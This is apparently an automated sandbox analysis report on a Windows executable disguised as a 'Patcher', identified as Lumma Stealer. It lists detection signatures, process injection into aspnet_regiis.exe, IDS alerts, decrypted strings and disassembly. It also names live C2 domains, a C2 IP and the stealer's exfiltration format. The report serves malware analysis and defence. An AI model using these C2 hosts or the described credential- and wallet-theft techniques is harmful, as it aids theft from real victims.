Edit tour

Windows Analysis Report
Patcher_I5cxa9AN.exe

Overview

General Information

Sample name:	Patcher_I5cxa9AN.exe
Analysis ID:	1584554
MD5:	f23b6bce35ed7e7fd538a426defd13b8
SHA1:	242506b0ef3ece7276a10ecafa756c72c28b3366
SHA256:	d181f3391f059ff37e887fd3e5055e83bc45d2f3ea744e37113564352948facb
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Patcher_I5cxa9AN.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\Patcher_I5cxa9AN.exe" MD5: F23B6BCE35ED7E7FD538A426DEFD13B8)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop"], "Build id": "LPnhqo--gyfsshbyotsj"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7332	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7332	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7332	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.binstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:54.551050+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:55.553164+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:56.848103+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.132.7	443	TCP
2025-01-05T20:41:58.395309+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.132.7	443	TCP
2025-01-05T20:41:59.616908+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.132.7	443	TCP
2025-01-05T20:42:00.966408+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.132.7	443	TCP
2025-01-05T20:42:02.614994+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.132.7	443	TCP
2025-01-05T20:42:06.017940+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:55.054770+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:56.119480+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:55.054770+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:56.119480+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	172.67.132.7	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:54.551050+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	172.67.132.7	443	TCP
2025-01-05T20:41:55.553164+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	172.67.132.7	443	TCP
2025-01-05T20:41:56.848103+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	172.67.132.7	443	TCP
2025-01-05T20:41:58.395309+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	172.67.132.7	443	TCP
2025-01-05T20:41:59.616908+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	172.67.132.7	443	TCP
2025-01-05T20:42:00.966408+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	172.67.132.7	443	TCP
2025-01-05T20:42:02.614994+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	172.67.132.7	443	TCP
2025-01-05T20:42:06.017940+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	172.67.132.7	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:54.045515+0100	2058638	1	Domain Observed Used for C2 Detected	192.168.2.4	59194	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T20:41:57.831328+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49732	172.67.132.7	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cureprouderio.click/$&%W&	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/api9	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/pi	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/bu	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/api(	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/gg	Avira URL Cloud: Label: malware
Source: cureprouderio.click	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/jh	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: Patcher_I5cxa9AN.exe

Malware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop"], "Build id": "LPnhqo--gyfsshbyotsj"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Patcher_I5cxa9AN.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: Patcher_I5cxa9AN.exe	String decryptor: cloudewahsj.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: rabidcowse.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: noisycuttej.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: tirepublicerj.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: framekgirus.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: wholersorie.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: abruptyopsn.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: nearycrepso.shop
Source: Patcher_I5cxa9AN.exe	String decryptor: cureprouderio.click
Source: Patcher_I5cxa9AN.exe	String decryptor: lid=%s&j=%s&ver=4.0
Source: Patcher_I5cxa9AN.exe	String decryptor: TeslaBrowser/5.5
Source: Patcher_I5cxa9AN.exe	String decryptor: - Screen Resoluton:
Source: Patcher_I5cxa9AN.exe	String decryptor: - Physical Installed Memory:
Source: Patcher_I5cxa9AN.exe	String decryptor: Workgroup: -
Source: Patcher_I5cxa9AN.exe	String decryptor: LPnhqo--gyfsshbyotsj

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_72C58664 CryptUnprotectData,

2_2_72C58664

Source: Patcher_I5cxa9AN.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: Patcher_I5cxa9AN.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov eax, D6C314C9h	0_2_6CE02450
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_6CE02450
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-000000BEh]	0_2_6CE38C30
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-0B398427h]	0_2_6CE38C30
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_6CE14434
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then test esi, esi	0_2_6CE36400
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_6CE3C5F0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov edx, dword ptr [esi+54h]	0_2_6CE075F5
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_6CE155FE
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	0_2_6CE0FDD1
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	0_2_6CE1A5D0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, dword ptr [0044D92Ch]	0_2_6CE0E580
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_6CE06D72
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_6CE06D72
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_6CE14579
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_6CE3C510
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]	0_2_6CE12EC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9B8995CDh	0_2_6CE12EC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov edx, ecx	0_2_6CE12EC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch	0_2_6CE106AC
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]	0_2_6CE38620
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov eax, ebx	0_2_6CE0EE3E
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	0_2_6CE11FC1
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	0_2_6CE10FC8
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, eax	0_2_6CE127DC
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then push ebp	0_2_6CE35FA0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_6CE0DF80
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0D67E2D4h]	0_2_6CE1F796
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_6CE18710
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, esi	0_2_6CE0F885
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, esi	0_2_6CE0F885
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then jmp eax	0_2_6CE07853
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then push eax	0_2_6CE3A020
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then push eax	0_2_6CE39800
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, eax	0_2_6CE1F005
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_6CE009C0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_6CE009C0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09h]	0_2_6CE159A0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx]	0_2_6CE059AE
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, eax	0_2_6CE1B9B0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_6CE1B9B0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+218BAD1Eh]	0_2_6CE12975
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp al, 20h	0_2_6CDFB947
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, eax	0_2_6CE122B6
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-7Dh]	0_2_6CE0E293
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+40h]	0_2_6CE14235
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_6CE38BC0
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov byte ptr [ecx], dl	0_2_6CE063C7
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, eax	0_2_6CE063C7
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh	0_2_6CE21B80
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov ecx, ebx	0_2_6CE16320
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov edi, edx	0_2_6CE24B30
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+289080F7h]	0_2_6CE14337
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then not eax	0_2_6CE1033F
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then jmp 02690B81h	0_2_026909EA
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_026910E8
Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_026910DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]	2_2_72C7F220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_72C611D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, word ptr [eax]	2_2_72C831F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], dl	2_2_72C4D972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], dl	2_2_72C4D972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	2_2_72C83110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh	2_2_72C68780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx]	2_2_72C4C5AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]	2_2_72C59AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9B8995CDh	2_2_72C59AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_72C59AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_72C6C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C6F2FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+23h]	2_2_72C81A8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi], ecx	2_2_72C7029E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch	2_2_72C572AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C6F210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi], ecx	2_2_72C7021D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, ebx	2_2_72C55A3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	2_2_72C58BC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C593DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [esi], cx	2_2_72C54B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-7Dh]	2_2_72C54B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [72C8D92Ch]	2_2_72C54B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-0D67E2D4h]	2_2_72C66396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push ebp	2_2_72C7CBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	2_2_72C6A3AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi+10h], ecx	2_2_72C6FBBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi], edx	2_2_72C6FBBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_72C79340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C69B53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	2_2_72C6EB53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C7D36B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4416C1D9h]	2_2_72C7D36B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_72C5F310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	2_2_72C5732C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C6AB3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C6E89E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, D6C314C9h	2_2_72C49050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_72C49050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then test esi, esi	2_2_72C7D000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C5B034
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-000000BEh]	2_2_72C7F830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-0B398427h]	2_2_72C7F830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	2_2_72C569D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, dword ptr [esi+54h]	2_2_72C4E1F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_72C5C1BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_72C5B179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	2_2_72C58EB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_72C6DE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then lea ecx, dword ptr [eax+43h]	2_2_72C70673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+40h]	2_2_72C5AE35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ecx], dl	2_2_72C4CFC7
